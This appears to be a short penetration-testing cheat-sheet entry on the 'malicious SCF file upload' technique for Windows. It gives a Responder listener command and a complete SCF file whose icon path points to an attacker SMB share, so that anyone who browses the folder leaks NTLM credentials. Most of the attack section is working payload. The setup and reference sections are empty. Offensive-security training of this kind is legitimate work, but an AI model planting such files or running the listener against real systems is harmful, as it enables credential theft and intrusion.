Malicious SCF File Upload

windows, rce, foothold, smb

Overview #

Attacker can upload a maliciuous SCF file that will connect to attacker SMB share once victim accessed it.

One example to access SCF file is via explorer.exe.

%SystemRoot%\explorer.exe "C:\Users\victim\desktop"

Environment Setup #

Steps #

sudo responder -I tun0
[Shell]
Command=2
IconFile=\\10.10.14.13\share\icon.ico
[Taskbar]
Command=ToggleDesktop

Reference #